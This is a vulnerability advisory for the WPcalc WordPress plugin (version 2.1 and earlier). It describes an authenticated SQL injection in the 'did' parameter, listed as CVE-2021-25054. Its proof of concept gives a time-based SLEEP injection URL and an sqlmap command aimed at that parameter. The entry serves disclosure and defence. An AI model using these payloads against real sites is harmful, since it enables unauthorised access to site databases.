WordPress Plugin Vulnerabilities

WPcalc <= 2.1 - Authenticated SQL Injection

Description

The plugin does not sanitize user input into the 'did' parameter and uses it in a SQL statement, leading to an authenticated SQL Injection vulnerability.

Plugin author closed the plugin.

Proof of Concept

http://www.example.com/wp-admin/admin.php?page=wpcalc&info=del&did=1 AND (SELECT 7156 FROM (SELECT(SLEEP(5)))MIkl)

or, using the sqlmap tool:

./sqlmap.py -r request.txt -dbms=mysql --current-user -b -p did --batch --flush-session

Affects Plugins

Plugin icon
wpcalc
No known fix

References

CVE
CVE-2021-25054

Classification

Type
SQLI
OWASP top 10
A1: Injection
CWE
CWE-89
CVSS
6.8 (medium)

Miscellaneous

Original Researcher
0xdecafbad
Verified
Yes
WPVDB ID
200969eb-e2a4-4200-82d7-0c313de089af

Timeline

Publicly Published
2021-12-06 (about 2 years ago)
Added
2021-12-09 (about 2 years ago)
Last Updated
2022-04-11 (about 2 years ago)

Other

Published
Title
Published
2020-11-20
Title
Anti-Spam by CleanTalk < 5.149 - Multiple Authenticated SQL Injections
Published
2015-02-21
Title
Gallery Bank <= 3.0.101 - SQL Injection
Published
2022-07-18
Title
WPDating < 7.4.0 - Multiple Unauthenticated SQLi
Published
2023-08-17
Title
Contact form 7 Custom validation <= 1.1.3 - Unauthenticated SQLi
Published
2021-07-23
Title
WordPress Membership SwiftCloud.io <= 1.0 - Authenticated SQL Injection